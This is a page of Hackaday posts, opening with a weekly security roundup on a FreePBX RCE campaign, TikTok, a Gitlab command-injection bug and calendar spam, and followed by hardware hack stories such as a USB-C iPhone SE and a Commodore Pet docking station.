This Week In Security: Asterisk, TikTok, Gitlab, And Finally A Spam Solution

July 22, 2022 by 14 Comments

There’s an ongoing campaign that’s compromising FreePBX systems around the world. It seems to be aimed specifically at Elastix systems, using CVE-2021-45461, a really nasty Remote Code Execution (RCE) from December of last year. This flaw was a 0-day, as it was discovered by analyzing a compromised FreePBX system. It’s unclear if the campaign described in last week’s report was using the 0-day back in December, or if it was launched as a result of the public disclosure of the bug.

Regardless, the CVE is a URL parameter sent to the Rest Phone Apps service. This module is intended to run right on the screen of VoIP phones, and allow end users to set features like Do Not Disturb without having to punch in star codes, or visit a web page. Because of the use case, any FreePBX deployment that supports VoIP phones connecting from outside the network, that use this feature, would need these ports open. The best way to secure that would be to enforce connections over a VPN, which only some phones natively support.

Upon finding a vulnerable endpoint, the campaign starts by dropping a webshell in several locations, all obfuscated slightly differently. It then creates multiple root-level user accounts, and adds a Cron job to maintain access. There is a surprising amount of obfuscation and stealth features in this family of malware, making it difficult to point to a single Indicator Of Compromise. If you run a FreePBX system that may have the Phone Apps module running, it’s time to go through it with a fine-toothed comb.

What’s The Deal with TikTok?

The FCC has once again called for TikTok to be de-listed from the Google Play Store and the Apple App store. What is going on with TikTok? It’s just an app for filming and sharing silly videos, right? There are essentially two potential problems with TikTok, and both of them trace back to the app’s parent company residing in China.

Here in the US we have National Security Letters, and China seems to have a more straightforward system, where “everything is seen in China,” as said by a member of TikTok’s Trust and Safety Department. TikTok uses quite a few permissions, some of which seem a bit overzealous. If you’re a person of interest to the Chinese government, could those permissions be used to surveil you? Absolutely. Just like a US based app could, as a result of a National Security Letter.

The second problem is a bit more subtle, and may stray towards a conspiracy theory, but is worth considering. TikTok has videos about every subject imaginable, from every possible viewpoint. What if the Chinese Communist Party (CCP) wanted a specific rumor to gain traction in the US? Just a little pressure on the video recommendation algorithm would make videos about that topic trend. Instant public opinion lever.

There’s likely a missing piece of the story here, in the form of some classified intel. Until enough time goes by that a Freedom of Information Act request can unlock the rest of the story, it’s going to be unclear how much of the TikTok threat is legitimate, and how much is geo-political wrangling.

Oh, and if you thought you could just go open up the Google Play Store and see the exact permissions the TikTok app uses, Google has made the unfortunate decision to hide permissions until you actually do the install. That sounds like a terrible decision and, after a brief outcry, it seems like Google agrees. Just before this article went to the presses, Google announced that they were walking back this decision.

Gitlab RCE

Gitlab fixed a very serious problem in its 4th of July round of minor version releases, and [Nguyễn Tiến Giang (Jang)] really wanted to understand what was going on with this one. So much so, that he set up a debuggable install of Gitlab and recreated the issue, bringing us along for the ride. The flaw is in importing an existing Gitlab project, where the archive name is appended directly to a command string. If you can manipulate the value given for the archive name, and avoid tripping on any of the checks intended to prevent it, you can trivially insert shell code that will be run on the underlying server. Avoiding the traps is a big part of the work to actually make this into an real PoC. Read the post for full details on the debugging journey.

Calendar Spam Finally Fixed

Consider yourself lucky if you’ve missed out on the scourge that is Calendar spam. Google Calendar is great, because anyone can send you an email with an invite, and the event automatically shows up on your calendar. In retrospect, it seems obvious that this would be used for spam. Regardless, after multiple years of the spam problem, Google is finally rolling out a feature, to only add invitations to your calendar from known senders. Now if you get asked, or suffer from spam yourself, you know to look under event settings, and make the setting change. Finally!

Now There’s USB-C On The IPhone SE

July 22, 2022 by 37 Comments

As confusing as it can be, USB-C is actually pretty good, and certainly has its fans. [David Buchanan] must be one of them, for he did a great job putting a USB-C port into his iPhone SE.

[David] didn’t want to ruin a pristine example, so set about hacking the cheapest first-gen iPhone SE he could find on eBay. His approach was simple: get a USB-C to Lightning dongle and hack it into the phone’s body.

The first step was to strip the adapter down and melt off the Lightning connector. He then de-soldered the Lightning port from the phone, and found a bunch of test pads on the motherboard corresponding to its pins. Soldering leads from the adapter to the test pads got things up and running, once he properly hooked up a connection-detect pin to ground.

With a bit more trimming, some hot glue and some enameled wire, [David] was able to cram everything inside the iPhone. Paired with a new screen and home button, and he had an iPhone SE with a working USB-C port. It works for both charging and USB data, too.

If you’re rocking an iPhone SE, you might dig this conversion as it gives you access to more chargers out in the wild. Plus, you’ve still got the regular headphone jack. Be sure to check out the iPhone 13 with a USB C port, too. It’s the hottest new hack until the new EU regulations hit Apple in coming years.

Pet Docking Station Was Two Decades In The Making

July 22, 2022 by 14 Comments

There are some projects which once might have been entirely appropriate, but which now seem sacrilegious. [Dave Luna]’s PC docking station in a Commodore Pet 64 case might at first sight seem to be one of them, but there’s a little more to it than gutting a cherished retrocomputer.

A much younger [Dave] had a dead Pet 64, and because over two decades ago such a thing was considered junk, set about converting it to a PC case. In the way of all ambitious projects it stalled, so here in 2022 he was starting with the metal case and keyboard of a Pet 64 rather than the full computer.

Into the case went a small color TFT monitor, a USB3 hub, a DisplayLink adapter, and and an Arduino Micro doing the job of USB-ifying the Commodore keyboard. The result is a pretty cool docking station, but one which he admits isn’t as nice to use as he’d like. Viewed through rose tinted glasses any PET was an amazing machine in its day, but a slightly lackluster keyboard and a tiny screen don’t quite have the same allure in a world of 4K monitors. Still, we’d have one on our desk.

The Pet appears in quite a few projects that have made it to these pages, for example showing YouTube videos.

Continue reading “Pet Docking Station Was Two Decades In The Making”

Turning The Back Of Your Phone Into A Touchpad

July 21, 2022 by 28 Comments

Smartphones use big touchscreens on the front as a useful tactile interface. However, our hands naturally wrap around the back of the phone, too. This area is underutilized as an interface, but the designers of BackTrack found a way to change that.

Touches on the 2D rear matrix are translated into a pair of touches on the linear line of pads on the front screen. This can then be reconstructed into the touch location on the rear touchpad.

The idea is simple. The project video notes that  conductive tape can be placed on a multitouch touchscreen, allowing touches to be read at a remote location. Taking this concept further, BackTrack works by creating a 2D matrix on the back of the phone, and connecting this matrix to a series of pads in a row on the front touchscreen. Then, touches on the back touchpad can be read by the existing touchscreen on the front screen. Continue reading “Turning The Back Of Your Phone Into A Touchpad”

Design Cities In A Snap With Buildify

July 21, 2022 by 7 Comments

Designing 3D environments is hard, but it doesn’t have to be. A week ago, if you decided to design an entire city in Blender, say for a game or animation, you probably would have downloaded some asset pack full of building shapes and textures and painstakingly placed them over the course of days, modifying the models and making new ones as needed. Now, you would just need to download Buildify, feed it an asset pack, and watch the magic happen.

Buildify, made by [Pavel Oliva], is one of the most impressive bits of Blender content we’ve seen in a long time. It lets you generate entire cities by drawing the outlines of buildings. You can grab walls and resize individual structures, and the walls, windows, doors, textures, and everything else will automatically rearrange as needed. You can even select a region on Open Street Maps and watch as Buildify recreates the area in Blender using your chosen asset pack (maybe a KiCad PCB design could be used as the source material too?). It’s really something incredible to see, and you’ve just got to watch the video below to understand just how useful this tool can be.

The pay-what-you-want .blend file that you can grab off of [Pavel]’s website doesn’t include all the beautiful assets you can see in the video, but instead generates simple grey block buildings. He made one of the packs used in the video, and will be releasing it online for free soon. In the meantime, he links to other ones you can buy, or you can get really ambitious and create your own. We know it won’t be long until we’re seeing animations and games with Buildify-generated cities.

Continue reading “Design Cities In A Snap With Buildify”

Reverse Engineering A Phased Array System Reveals Surprising Details

July 21, 2022 by 13 Comments

The term “phased array” has been around for a long time, but in recent years we’ve heard more and more about the beam shaping that’s possible with phased array antennae. In the video below the break, [The Signal Path] breaks down a Qualcomm 60GHz WiGig unit, and does a deep dive, even looking at the bare silicon and an x-ray of an antenna.

An X-Ray of the antenna shows the intricate design

Some fascinating highlights include how not only the data signal is sent to the antennae through a standard coaxial cable, but so are control signals and a base clock frequency. [The Signal Path] explains how the manufacturer chose to use what’s called a SuperHeterodyne (aka “superhet”) architecture, which is not all that different from those used in traditional amateur radio transceivers. In theory, anyway.

Another element that is discussed is how the PCB’s themselves are used as waveguides, inductors, and transmission line matches, among other countless little hacks to fit a rather complex system into a truly diminutive space.

If you’re not familiar the concept behind phased arrays, check out this article we published in 2019 that shows how phased arrays can steer a beam without any moving parts. It’s quite fascinating!

Continue reading “Reverse Engineering A Phased Array System Reveals Surprising Details”

Simple Binary Watch Uses A PCB Body

July 21, 2022 by 3 Comments

There are many ways to tell the time, from using analog dials to 7-segment displays. Hackers tend to enjoy binary watches, if only for their association with the digital machines that seem to make the world turn these days. [Vishal Soni] decided to build one of their own.

It’s a straightforward design, that uses six bits to show the time. A red light is illuminated at the top of the watch to indicate the watch is showing minutes, and these are displayed in binary on the six blue LEDs below. Then, the watch indicates it is showing hours, and again uses the six blue LEDs to show the relevant number. Continue reading “Simple Binary Watch Uses A PCB Body”